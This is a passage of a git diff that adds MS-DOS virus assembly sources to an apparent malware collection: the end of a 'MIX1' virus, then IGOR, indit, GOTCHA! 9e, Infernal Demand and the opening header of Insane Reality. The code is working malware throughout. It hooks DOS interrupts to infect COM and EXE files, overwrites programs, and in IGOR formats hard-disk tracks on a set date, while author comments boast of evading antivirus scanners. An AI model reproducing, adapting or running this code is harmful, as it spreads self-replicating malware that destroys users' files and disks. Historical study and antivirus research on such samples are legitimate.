0000H, 0FA0H, 0B800H + DW 0001H, 4000H, 0B800H + DW 0001H, 4000H, 0B800H + DW 0001H, 4000H, 0B800H + DW 0000H, 0FA0H, 0B000H + DW 0001H, 3E80H, 0B000H + DW 0001H, 7D00H, 0B000H + DW 0001H, 7D00H, 0B000H + DW 0002H, 0000H, 0000H + DW 0002H, 0000H, 0000H + DW 0001H, 7D00H, 0A000H + DW 0001H, 0FA00H, 0A000H + DW 0001H, 6D60H, 0A000H + DW 0002H, 0000H. 0000H + + DW 0 + +ERRTAB DB 00H,01H,02H,03H,04H,05H,06H,07H,08H,09H,0BH,0AH,0CH,0DH,0EH,0FH + DB 10H,11H,12H,13H,14H,15H,16H,17H,18H,19H,1BH,1AH,1CH,1DH,1FH,1EH + DB 20H,21H,22H,23H,24H,25H,26H,27H,29H,28H,2AH,2DH,2CH,2BH,2EH,2FH + DB 30H,31H,32H,33H,34H,35H,36H,37H,38H,39H,3AH,3BH,3EH,3DH,3CH,3FH + DB 40H,42H,45H,43H,44H,41H,50H,47H,48H,59H,4AH,4BH,4CH,4DH,4EH,55H + DB 46H,51H,52H,53H,54H,4FH,56H,57H,58H,49H,5AH,5DH,5CH,5BH,5EH,5FH + DB 60H,65H,62H,73H,64H,61H,70H,67H,68H,65H,6AH,6BH,6CH,6DH,6EH,75H + DB 66H,71H,72H,63H,74H,6FH,76H,77H,78H,79H,7AH,7DH,7CH,7BH,7EH,7FH + DB 92H,81H,82H,83H,84H,85H,86H,8BH,9AH,89H,8AH,87H,8CH,8DH,8EH,8FH + DB 90H,99H,80H,93H,94H,95H,96H,97H,98H,91H,88H,9BH,9CH,9DH,9EH,9FH + DB 0A0H,0A1H,0A2H,0A3H,0A4H,0A5H,0A6H,0A7H,0A8H,0A9H,0BBH,0ABH,0ACH + DB 0B0H,0B1H,0B2H,0B3H,0B4H,0B5H,0B6H,0B7H,0B8H,0B9H,0BAH,0AAH,0D9H + DB 0C8H,0C1H,0C2H,0C3H,0C4H,0C5H,0C6H,0C7H,0C0H,0A9H,0CAH,0CBH,0CCH + DB 0D0H,0D1H,0D2H,0D3H,0D4H,0D5H,0D6H,0D7H,0D8H,0BCH,0DAH,0DBH,0DCH + DB 0E0H,0E1H,0E2H,0E3H,0E4H,0E5H,0E6H,0E7H,0E8H,0E9H,0EAH,0EBH,0ECH + DB 0F0H,0F1H,0F2H,0F3H,0F4H,0F5H,0F6H,0F7H,0F8H,0F9H,0FAH,0FBH,0FCH + +CONST1 DB 1 ; Just the constant 1 +CONST0 DW 0 ; The label says it all +MIN60 DB 0 ; Flag, set to 1 60 minutes after execution +MIN50 DB 0 ; Flag, set to 1 50 minutes after execution +VMODE DB 0 ; Video mode +MAXLIN DB 24 +MYCOL DB 0 ; Position of ball on screen +MYLINE DB 0 ; ditto. +ONSCREEN DB ? ; Previous character on the screen +UPDOWN DB 0 ; Direction of ball (up or down) +LEFTRIGHT DB 0 ; Direction (left or right) +SCRCOL DB ? +SCRLINE DB ? +DATE1 DW ? ; Date of file +DATE2 DW ? ; ditto. +TIMER DW 0 ; Number of timer (INT 8) ticks +LEN_LO DW ? +LEN_HI DW ? +NOINF DW 0 ; Number of infections +ID LABEL WORD + DB "MIX1" ; The signature of the virus. +; +; A buffer, used for data from the file. +; + +VIRUS ENDP +CODE ENDS + + END LABEL + of the \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.igor.asm b/MSDOS/Virus.MSDOS.Unknown.igor.asm new file mode 100644 index 00000000..1a6d0643 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.igor.asm @@ -0,0 +1,536 @@ + +PAGE 59,132 + +; +; +; IGOR +; +; Created: 12-Jul-92 +; Passes: 5 Analysis Options on: none +; (c) 1992 by Igor Ratzkopf - All Rights Reserved July R +; +; + +data_1e equ 16h +data_2e equ 469h ;* +data_3e equ 103h ;* +data_4e equ 1 ;* +data_5e equ 3 ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +igor proc far + +start:: + jmp short $+3 ; delay for I/O + nop + call sub_1 + +igor endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop bp + sub bp,106h + push ax + push bx + push cx + push dx + push si + push di + push bp + push es + push ds + mov ax,7BCDh + int 21h ; ??INT Non-standard interrupt + cmp bx,7BCDh + je loc_4 ; Jump if equal + xor bx,bx ; Zero register + push cs + pop ds + mov cx,es + mov ax,3509h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr cs:data_11+2[bp],es + mov cs:data_11[bp],bx + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr cs:data_9+2[bp],es + mov cs:data_9[bp],bx + dec cx + mov es,cx + mov bx,es:data_5e + mov dx,3C3h + mov cl,4 + shr dx,cl ; Shift w/zeros fill + add dx,4 + mov cx,es + sub bx,dx + inc cx + mov es,cx + mov ah,4Ah + int 21h ; DOS Services ah=function 4Ah + ; change memory allocation + ; bx=bytes/16, es=mem segment + jc loc_4 ; Jump if carry Set + mov ah,48h ; 'H' + dec dx + mov bx,dx + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + jc loc_4 ; Jump if carry Set + dec ax + mov es,ax + mov cx,8 + mov es:data_4e,cx + sub ax,0Fh + mov di,data_3e + mov es,ax + mov si,bp + add si,103h + mov cx,3C3h + cld ; Clear direction + repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] + mov ax,2521h +;* mov dx,offset loc_3 ;* + db 0BAh, 8Fh, 02h + push es + pop ds + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,2509h +;* mov dx,offset loc_2 ;* + db 0BAh, 1Ah, 02h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + push cs + pop ds +loc_4:: + cmp cs:data_25[bp],5A4Dh + je loc_5 ; Jump if equal + mov bx,offset data_25 + add bx,bp + mov ax,[bx] + mov word ptr ds:[100h],ax + add bx,2 + mov al,[bx] + mov byte ptr ds:[102h],al + pop ds + pop es + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + mov ax,offset start + push ax + retn +data_9 dw 0, 0 ; Data table (indexed access) +data_11 dw 0, 0 ; Data table (indexed access) +loc_5:: + mov bx,cs:data_33[bp] + mov dx,cs + sub dx,bx + mov ax,dx + add ax,cs:data_18[bp] + add dx,cs:data_20[bp] + mov bx,cs:data_17[bp] + mov word ptr cs:[216h][bp],bx + mov word ptr cs:[218h][bp],ax + mov ax,cs:data_19[bp] + mov word ptr cs:[20Ch][bp],dx + mov word ptr cs:[212h][bp],ax + pop ds + pop es + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + mov ax,0 + cli ; Disable interrupts + mov ss,ax + mov sp,0 + sti ; Enable interrupts +;* jmp far ptr loc_1 ;* +sub_1 endp + + db 0EAh, 00h, 00h, 00h, 00h + ;* No entry point to code + push ax + in al,60h ; port 60h, keybd scan or sw1 + cmp al,53h ; 'S' + je loc_7 ; Jump if equal +loc_6:: + pop ax + jmp dword ptr cs:data_11 +loc_7:: + mov ah,2Ah + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dh=month + ; dl=day, al=day-of-week 0=SUN + cmp dl,18h + jne loc_6 ; Jump if not equal + mov ch,0 + +locloop_8:: + mov ah,5 + mov dh,0 + mov dl,80h + int 13h ; Disk dl=drive 0 ah=func 05h + ; format track=ch or cylindr=cx + ; al=interleave, dh=head + inc ch + cmp ch,20h ; ' ' + loopnz locloop_8 ; Loop if zf=0, cx>0 + +;* jmp far ptr loc_31 ;* + db 0EAh,0F0h,0FFh,0FFh,0FFh + db 0CFh +loc_9:: + pushf ; Push flags + push cs + call sub_2 + test al,al + jnz loc_ret_12 ; Jump if not zero + push ax + push bx + push es + mov ah,51h + int 21h ; DOS Services ah=function 51h + ; get active PSP segment in bx + ;* undocumented function + mov es,bx + cmp bx,es:data_1e + jne loc_11 ; Jump if not equal + mov bx,dx + mov al,[bx] + push ax + mov ah,2Fh + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + pop ax + inc al + jnz loc_10 ; Jump if not zero + add bx,7 +loc_10:: + mov ax,es:[bx+17h] + and ax,1Fh + xor al,1Dh + jnz loc_11 ; Jump if not zero + and byte ptr es:[bx+17h],0E0h + sub word ptr es:[bx+1Dh],3C3h + sbb es:[bx+1Fh],ax +loc_11:: + pop es + pop bx + pop ax + +loc_ret_12:: + iret ; Interrupt return + ;* No entry point to code + cmp ax,4B00h + je loc_14 ; Jump if equal + cmp ah,11h + je loc_9 ; Jump if equal + cmp ah,12h + je loc_9 ; Jump if equal + cmp ax,7BCDh + jne loc_13 ; Jump if not equal + jmp short loc_14 + db 90h + +; +; SUBROUTINE +; + +sub_2 proc near +loc_13:: + jmp dword ptr cs:data_9 +loc_14:: + and [bx+si],ah + and [bx+si],ah + and [bx+si],ah + push es + push ds + cmp ax,7BCDh + jne loc_15 ; Jump if not equal + push cs + pop ds + mov dx,4B7h + jmp short loc_16 + db 90h +loc_15:: + call sub_5 + jc loc_18 ; Jump if carry Set +loc_16:: + mov ax,4300h + int 21h ; DOS Services ah=function 43h + ; get attrb cx, filename @ds:dx + jc loc_19 ; Jump if carry Set + test cl,1 + jz loc_17 ; Jump if zero + and cl,0FEh + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + jc loc_19 ; Jump if carry Set +loc_17:: + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_19 ; Jump if carry Set + mov bx,ax + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + mov al,cl + or cl,1Fh + dec cx + dec cx + xor al,cl + jz loc_19 ; Jump if zero + push cs + pop ds + mov data_21,cx + mov data_22,dx + mov ah,3Fh ; '?' + mov cx,20h + mov dx,offset data_25 + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + jc loc_18 ; Jump if carry Set + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_18 ; Jump if carry Set + cmp cs:data_25,5A4Dh + je loc_21 ; Jump if equal + mov cx,ax + sub cx,3 + mov cs:data_24,cx + call sub_3 + jc loc_18 ; Jump if carry Set + mov ah,40h ; '@' + mov dx,offset data_23 + mov cx,3 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_18:: + mov cx,cs:data_21 + mov dx,cs:data_22 + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + mov ah,3Eh + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_19:: + pop ds + pop es + pop di + pop si + pop dx + pop cx + pop bx + pop ax + cmp ax,7BCDh + jne loc_20 ; Jump if not equal + mov bx,ax +loc_20:: + jmp dword ptr cs:data_9 +loc_21:: + mov cx,cs:data_32 + mov cs:data_17,cx + mov cx,cs:data_33 + mov cs:data_18,cx + mov cx,cs:data_31 + mov cs:data_19,cx + mov cx,cs:data_30 + mov cs:data_20,cx + push ax + push dx + call sub_4 + sub dx,cs:data_29 + mov cs:data_33,dx + mov cs:data_32,ax + pop dx + pop ax + add ax,3C3h + adc dx,0 + push ax + push dx + call sub_4 + sub dx,cs:data_29 + add ax,40h + mov cs:data_30,dx + mov cs:data_31,ax + pop dx + pop ax + push bx + push cx + mov cl,7 + shl dx,cl ; Shift w/zeros fill + mov bx,ax + mov cl,9 + shr bx,cl ; Shift w/zeros fill + add dx,bx + and ax,1FFh + jz loc_22 ; Jump if zero + inc dx +loc_22:: + pop cx + pop bx + mov cs:data_26,ax + mov cs:data_27,dx + call sub_3 + jc loc_23 ; Jump if carry Set + mov ah,40h ; '@' + mov dx,data_2e + mov cx,20h + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_23:: + jmp loc_18 +sub_2 endp + +data_17 dw 0 ; Data table (indexed access) +data_18 dw 0 ; Data table (indexed access) +data_19 dw 0 ; Data table (indexed access) +data_20 dw 0 ; Data table (indexed access) + +; +; SUBROUTINE +; + +sub_3 proc near + mov ah,40h ; '@' + mov dx,103h + mov cx,3C3h + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jc loc_24 ; Jump if carry Set + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_24 ; Jump if carry Set + clc ; Clear carry flag + retn +loc_24:: + stc ; Set carry flag + retn +sub_3 endp + + +; +; SUBROUTINE +; + +sub_4 proc near + push bx + push cx + mov cl,0Ch + shl dx,cl ; Shift w/zeros fill + mov bx,ax + mov cl,4 + shr bx,cl ; Shift w/zeros fill + add dx,bx + and ax,0Fh + pop cx + pop bx + retn +sub_4 endp + + +; +; SUBROUTINE +; + +sub_5 proc near + push si + push cx + mov si,dx + mov cx,128h + +locloop_25:: + cmp byte ptr [si],2Eh ; '.' + je loc_26 ; Jump if equal + inc si + loop locloop_25 ; Loop if cx > 0 + +loc_26:: + cmp word ptr [si-2],544Fh + jne loc_27 ; Jump if not equal + cmp word ptr [si-4],5250h + je loc_30 ; Jump if equal +loc_27:: + cmp word ptr [si-2],4E41h + jne loc_28 ; Jump if not equal + cmp word ptr [si-4],4353h + je loc_30 ; Jump if equal +loc_28:: + cmp word ptr [si-2],2041h + jne loc_29 ; Jump if not equal + cmp word ptr [si-4],454Ch + je loc_30 ; Jump if equal +loc_29:: + pop cx + pop si + clc ; Clear carry flag + retn +loc_30:: + pop cx + pop si + stc ; Set carry flag + retn +sub_5 endp + +data_21 dw 0 +data_22 dw 0 +data_23 db 0E9h +data_24 dw 9090h +data_25 dw 0CD90h ; Data table (indexed access) +data_26 dw 20h +data_27 dw 0 + db 0, 0 +data_29 dw 0 + db 0, 0, 0, 0 +data_30 dw 0 +data_31 dw 0 + db 0, 0 +data_32 dw 0 +data_33 dw 0 ; Data table (indexed access) + db 15 dup (0) +copyright db '(c) 1992 by Igor Ratzkopf - All ' + db 'Rights Reserved July R' + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.indit.asm b/MSDOS/Virus.MSDOS.Unknown.indit.asm new file mode 100644 index 00000000..72a9e7fb --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.indit.asm @@ -0,0 +1,92 @@ +start segment + assume cs:start,ds:start +boot equ 1000h + push ax + push bx + push cx + push dx + push es + push ds + push di + push si + call cim +cim: pop bx + mov si,5aa5h + mov di,55aah + push cs + pop es +ujra: add bx,1000 + cmp bx,1000 + jnc kilep1 + jmp kilep +kilep1: push bx + mov ax,201h + mov dx,0 + mov cx,1 + int 13h + pop bx + jnc tovabb + cmp ah,6 + jz kilep1 + jmp kilep +tovabb: cmp si,0a55ah + jz kilep + mov ax,cs + add ax,1000h + push bx + push ax + int 12h + mov bx,64 + mul bx + sub ax,1000h + mov bx,ax + pop ax + cmp bx,ax + jnc oke1 + pop bx + jmp kilep +oke1: pop bx +oke: mov es,ax + mov ax,cs:[bx+18h] + mov cx,cs:[bx+1ah] + mul cx + mov cx,ax + mov ax,cs:[bx+13h] + mov dx,0 + div cx + sub bx,1000 + push bx + mov ch,al + mov cl,1 + mov bx,100h + mov dx,0 + mov ax,208h + int 13h + pop bx + jc kilep + push bx + mov bx,100h + mov ax,es:[bx] + cmp ax,2452h + pop bx + jnz kilep + mov ax,bx + add ax,offset kilep-offset cim + push cs + push ax + mov ax,10ah + push es + push ax + retf +kilep: pop si + pop di + pop ds + pop es + pop dx + pop cx + pop bx + pop ax + ret +cime: dw 0 +start ends + end \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.inf9.asm b/MSDOS/Virus.MSDOS.Unknown.inf9.asm new file mode 100644 index 00000000..c2fbca9a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.inf9.asm @@ -0,0 +1,571 @@ +;**************************************************************************** +;* GOTCHA! Version 9e +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + org 100h + +SIGNLEN equ signend - signature +FILELEN equ end - begin +RESPAR equ (FILELEN/16) + 17 +VERSION equ 9 +BUFLEN equ 20h +COMSIGN equ 0 +EXESIGN equ 1 +MINTARGET equ 1000 +MAXTARGET equ -FILELEN + + .RADIX 16 + + +;**************************************************************************** +;* Start the program! +;**************************************************************************** + +begin: xor bx,bx + call install + int 20 + + +;**************************************************************************** +;* Data +;**************************************************************************** + +buffer db BUFLEN dup (?) +oi21 dw ?,? +oldlen dw ?,? +nameptr dw ?,? +handle dw ? +comexe db ? + + +;**************************************************************************** +;* File-extensions +;**************************************************************************** + +EXE_txt db 'EXE' +COM_txt db 'COM' + + +;**************************************************************************** +;* Interupt handler 24 +;**************************************************************************** + +ni24: mov al,03 + iret + + +;**************************************************************************** +;* Interupt handler 21 +;**************************************************************************** + +ni21: pushf + + cmp ax,0DADAh ;install-check ? + je do_DADA + + push dx + push cx + push bx + push ax + push si + push di + push ds + push es + + cmp ax,6C00h ;open/create 4.00 ? + je do_6C00 + cmp ah,56h ;rename ? + je doit + cmp ah,4Eh ;findfirst ? + je doit ;(only works without wildcards) + cmp ah,4Bh ;load / execute ? + je doit + cmp ah,43h ;attributes + je doit + cmp ah,41h ;delete ? + je doit ;(it might be un-deleted!) + cmp ah,3Dh ;open ? + je do_3D + + cmp ah,17h ;FCB-rename? + je doFCB + cmp ah,13h ;FCB-delete? + jne exit + +doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's! + +doit: call infect + +exit: pop es + pop ds + pop di + pop si + pop ax + pop bx + pop cx + pop dx + popf + + jmp dword ptr cs:[oi21] ;call to old int-handler + + +do_3D: test al,03h ;only if opened for READING + jne exit + jmp short doit + +do_6C00: test bl,03h ;idem + jne exit + mov dx,di ;ptr was DS:DI + jmp short doit + +do_DADA: mov ax,0A500h+VERSION ;return a signature + popf + iret + + +;**************************************************************************** +;* Old Interupt handler 21 +;**************************************************************************** + +org21: pushf + call dword ptr cs:[oi21] ;call to old int-handler + ret + + +;**************************************************************************** +;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + mov cs:[nameptr],dx ;save the ptr to the filename + mov cs:[nameptr+2],ds + + mov ah,62h ;get segment-adres of PSP + int 21 + mov ds,bx ;get seg-adres of environment + mov ax,ds:002Ch + mov ds,ax + mov si,0 + +envloop: cmp ds:[si],byte ptr 0 ;end of environment? + je verder7 + + push cs + pop es + mov di,offset envstring + mov bx,0 + +scloop: mov al,ds:[si] ;check the current env-item + cmpsb + je scv1 + inc bx ;characters don't match! +scv1: cmp al,0 ;end of env-item? + jne scloop + + cmp bx,0 ;did all characters match? + je return + jmp short envloop + +verder7: push cs ;check the filename + pop ds + les di,dword ptr [nameptr] + mov dx,di + mov cx,80 ;search end of filename (-EXT) + mov al,'.' + repnz scasb + mov bx,di + + std ;find begin of filename + mov cl,11 + mov al,'\' + repnz scasb + cld + je vvv + mov di,dx + jmp short vvv2 +vvv: add di,2 +vvv2: mov al,'V' ;is it V*.* ? + scasb + je return + + mov cl,7 ;is it *AN*.* ? + mov ax,'NA' +ANloop: dec di + scasw + loopnz ANloop + je return + + mov si,offset EXE_txt ;is extension 'EXE'? + mov di,bx + mov cx,3 + rep cmpsb + jnz verder4 + + mov byte ptr [comexe],EXESIGN + jmp short verder3 + +return: ret + +verder4: mov si,offset COM_txt ;is extension 'COM'? + mov di,bx + mov cx,3 + rep cmpsb + jnz return + + mov byte ptr [comexe],COMSIGN + +verder3: mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + xor dl,dl ;clear the flag + mov ax,3301h + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + push cs ;set int24 vec to new handler + pop ds + mov dx,offset ni24 + mov ax,2524h + int 21 + + lds dx,dword ptr [nameptr] ;get file-attribute + mov ax,4300h + call org21 + push cx + + and cx,0F8h ;clear READ-ONLY-flag + call setattr + jc return1_v + + push cs ;open the file + pop ds + lds dx,dword ptr [nameptr] + mov ax,3D02h + int 21 + jnc verder2 +return1_v: jmp return1 ;something went wrong... :-( + +verder2: push cs ;save handle + pop ds + mov [handle],ax + + mov bx,[handle] ;get file date & time + mov ax,5700h + int 21 + push cx + push dx + + call endptr ;get file-length + mov [oldlen],ax + mov [oldlen+2],dx + + sub ax,SIGNLEN ;move ptr to end - SIGNLEN + sbb dx,0 + mov cx,dx + mov dx,ax + mov al,00h + call ptrmov + + mov cx,SIGNLEN ;read the last bytes + mov dx,offset buffer + call flread + jc return2_v + + push cs ;compare bytes with signature + pop es + mov di,offset buffer + mov si,offset signature + mov cx,SIGNLEN + rep cmpsb + jz return2_v + + call beginptr ;read begin of file + mov cx,BUFLEN + mov dx,offset buffer + call flread + + cmp byte ptr [comexe],EXESIGN + jz do_exe + +do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file + jnb return2 + cmp word ptr [oldlen],MINTARGET + jbe return2 + + call writeprog ;write program to end of file + jc return2 + + mov ax,[oldlen] ;calculate new start-adres + add ax,(offset entry - 0103h) + mov byte ptr [buffer],0E9h ;'JMP' + mov word ptr [buffer+1],ax + + jmp short verder1 + +return2_v: jmp short return2 + + +do_exe: call writeprog ;write program to end of file + jc return2 + + mov ax,[oldlen] ;calculate new length + mov dx,[oldlen+2] + add ax,FILELEN + adc dx,0 + + mov cl,9 ;put new length in header + shr ax,cl + mov cl,7 + shl dx,cl + or ax,dx + inc ax + mov word ptr [buffer+4],ax + mov ax,[oldlen] + add ax,FILELEN + and ax,01FFh + mov word ptr [buffer+2],ax + + mov ax,[oldlen] ;calculate new CS & IP + mov dx,[oldlen+2] + mov bx,word ptr [buffer+8] + push ax + mov cl,4 + shr ax,cl + mov cl,0Ch + shl dx,cl + add ax,dx + sub ax,bx + mov word ptr [buffer+16h],ax ;put CS in header + pop ax + and ax,000Fh + add ax,(offset entry - 0100h) + mov word ptr [buffer+14h],ax ;put IP in header + +verder1: call beginptr ;write new begin of file + mov cx,BUFLEN + mov dx,offset buffer + call flwrite + +return2: mov bx,[handle] ;restore file date & time + pop dx + pop cx + mov ax,5701h + int 21 + + mov bx,[handle] ;close the file + mov ah,3Eh + int 21 + +return1: pop cx ;restore file-attribute + call setattr + + pop ds ;restore int24 vector + pop dx + mov ax,2524h + int 21 + + pop dx ;restore ctrl-break flag + mov ax,3301h + int 21 + + ret + + +;**************************************************************************** +;* Gets ASCIIZ-filename from FCB +;**************************************************************************** + +FCBtoASC: mov si,dx + lodsb + inc al ;extended FCB? + jne normal_FCB + add si,7 +normal_FCB: push cs + pop es + xor di,di ;adres for ASCIIZ-name + mov dx,di + mov cx,8 +FCB_loop: lodsb ;copy all except spaces + cmp al,' ' + je FCB_verder + stosb +FCB_verder: loop FCB_loop + mov al,'.' ;append a '.' + stosb + mov cl,3 ;and the extension + rep movsb + xchg ax,cx ;and a final zero. + stosb + push es + pop ds + ret + + +;**************************************************************************** +;* Changes file-attributes +;**************************************************************************** + +setattr: lds dx,dword ptr cs:[nameptr] + mov ax,4301h + call org21 + ret + + +;**************************************************************************** +;* Writes program to end of file +;**************************************************************************** + +writeprog: call endptr + mov cx,FILELEN + mov dx,offset begin +; call flwrite ;Hmm, save a few bytes! +; ret + + +;**************************************************************************** +;* Subroutines for reading/writing +;**************************************************************************** + +flwrite: mov ah,40h + jmp short flvrdr + +flread: mov ah,3Fh +flvrdr: push cs + pop ds + mov bx,cs:[handle] + int 21 + ret + + +;**************************************************************************** +;* Subroutines for file-pointer +;**************************************************************************** + +beginptr: mov al,00h ;go to begin of file + jmp short ptrvrdr + +endptr: mov al,02h ;go to end of file +ptrvrdr: xor cx,cx + xor dx,dx + +ptrmov: mov bx,cs:[handle] ;go somewhere + mov ah,42h + int 21 + ret + + +;**************************************************************************** +;* This is where infected files start +;**************************************************************************** + +entry: call entry2 +entry2: pop bx + sub bx,offset entry2 ;CS:BX is begin program - 100h + + pushf + cld + + cmp byte ptr cs:[bx+offset comexe],COMSIGN + jz entryC + +entryE: mov ax,ds ;put old start-adres on stack + add ax,10 + add ax,cs:[bx+offset buffer+016h] + push ax + push cs:[bx+offset buffer+014h] + + jmp short entcheck + +entryC: mov ax,bx ;restore old file-begin + add ax,offset buffer + mov si,ax + mov di,0100 + mov cx,BUFLEN + rep movsb + + push cs ;put old start-adres on stack + mov ax,0100h + push ax + +entcheck: mov ax,0DADAh ;already installed? + int 21h + cmp ah,0A5h + je entstop + + call install ;install the program + +entstop: iret + + +;**************************************************************************** +;* Install the program at top of memory +;**************************************************************************** + +install: push ds + push es + + xor ax,ax ;get original int21 vector + mov es,ax + mov cx,word ptr es:0084h + mov dx,word ptr es:0086h + mov cs:[bx+offset oi21],cx + mov cs:[bx+offset oi21+2],dx + + mov ax,ds ;adjust memory-size + dec ax + mov es,ax + cmp byte ptr es:[0000h],5Ah + jnz cancel + mov ax,es:[0003h] + sub ax,RESPAR + jb cancel + mov es:[0003h],ax + sub es:[0012h], word ptr RESPAR + + push cs ;copy program to top + pop ds + mov es,es:[0012h] + mov ax,bx + add ax,0100 + mov si,ax + mov di,0100h + mov cx,FILELEN + rep movsb + + mov dx,offset ni21 ;set vector to new handler + push es + pop ds + mov ax,2521h + int 21h + +cancel: pop es + pop ds + + ret + + +;**************************************************************************** +;* Text and Signature +;**************************************************************************** + +envstring: db 'E=mc',0 ;put this in your environment! + +signature: db 'GOTCHA!',0 ;I have got you! :-) +signend: + + + +end: + +cseg ends + end begin + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.inferdem.asm b/MSDOS/Virus.MSDOS.Unknown.inferdem.asm new file mode 100644 index 00000000..879780cc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.inferdem.asm @@ -0,0 +1,164 @@ +; VirusName: Infernal Demand +; Country : Sweden +; Author : Metal Militia / Immortal Riot +; Date : 10/08/1993 +; +; +; This is our (Metal Militia's) very first scratch virus. It's just +; an overwriting one. It overwrites the first 999 bytes in exe/com +; files. (Write protected/hidden files are also "infected"). This (999) +; isn't really the virus size, but the virus, is set to overwrite the +; first 999 bytes. If the programs are less then 999 bytes, the virus +; will overwrite it anyhow. +; +; When you starts this, the virus will make a file under your c:\ +; which is called "Infernal.ir". The file includes a rather nice +; "poem" written by the person sitting behind the keys here.. +; +; The "infected" files attributes (time/day), will be saved +; and restored, the file-size will not be hidden, but anyway.. +; +; It doesn't contain any encryption nor nuking routine, but +; who cares about that for an overwriting virus? +; +; F-prot finds this is some trivial-shit, but it ain't! +; Mcafee scan v108 and S&S Toolkit's FindViru can't find this +; +; ----------- +; INFERNAL DEMAND +; ----------- +cseg segment byte public + assume cs:cseg, ds:cseg + + org 100h + + INFERNAL proc far + +start: + mov ah,19h ; get current drive + int 21h ; + push ax ; + + mov ah,0Eh ; + mov dl,02h ; drive C: + int 21h + +great: + mov dx,offset ExeMask ; offset 'EXEMASK' + mov ah,4Eh ; find first + int 21h ; + + jnc go_for_it ; jmp if no ERROR + + + mov dx,offset ComMask ; offset 'COMMASK' + mov ah,4Eh ; find first + ; +again: ; + int 21h ; + + jc chdir ; If ERROR change directory + + +go_for_it: + mov ax,4300h ; Get attribute of file + mov dx,9eh ; Pointer to name in DTA + int 21h ; + + push cx ; Push the attrib to stack + + mov ax,4301h ; Set attribute to + xor cx,cx ; normal + int 21h ; + + mov ax,3D02h ; Open file + mov dx,9eh ; Pointer to name in DTA + int 21h + + jc next ; if error, get next file + + xchg ax,bx ; Swap AX & BX + ; so the filehandle ends up + ; in BX + + mov ax,5700h ; Get file date + int 21h ; + + + push cx ; Save file dates + push dx ; + + mov dx,100h ; Write code from 100h + mov ah,40h ; to target file. + mov cx,789 ; Write XXX bytes + int 21h ; + + + pop dx ; Get the saved + pop cx ; filedates from the stack + + mov ax,5701h ; Set them back to the file + int 21h ; + + mov ah,3Eh ; Close the file + int 21h ; + + pop cx ; Restore the attribs from + ; the stack. + + mov dx,9eh ; Pointer to name in DTA + mov ax,4301h ; Set them attributes back + int 21h ; + +next: + mov ah,4Fh ; now get the next file + jmp short again ; and do it all over again + +chdir: + mov ah,3ch + mov cx,0 + mov dx,offset makeit + int 21h + + xchg ax,bx + mov ah,40h + mov cx,meslen + mov dx,offset note + int 21h + + mov ah,3eh + int 21h + + mov dx,offset updir ; offset 'updir' + mov ah,3bh ; change directory + int 21h + + jnc great ; jmp to great if no ERROR + +exit: + pop dx ; + mov ah,0Eh ; restore org. drive + int 21h ; + + retn ; return to PROMPT + + +ExeMask db '*.EXE',0 +ComMask db '*.COM',0 +Makeit db 'c:\infernal.ir',0 +UpDir db '..',0 +Note db 'Infernal Demand! ' + db '(c) Metal Militia / Immortal Riot ' +Dumpnote db ' ',0dh,0ah + db 'Your misery is our pleasure! ',0dh,0ah + db 'Your nightmare is our dream! ',0dh,0ah + db 'Your hell is our paradise! ',0dh,0ah + db 'Your lost is our demand! ',0dh,0ah + db 'Your cry is our laugh! ',0dh,0ah + db 'And your fate is ours!',0dh,0ah +Meslen equ $-note + + INFERNAL endp + +cseg ends + end start \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.insane.asm b/MSDOS/Virus.MSDOS.Unknown.insane.asm new file mode 100644 index 00000000..5cda495c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.insane.asm @@ -0,0 +1,601 @@ +; VirusName : Insane Reality +; Country : Sweden +; Author : The Unforiven / Immortal Riot +; Date : 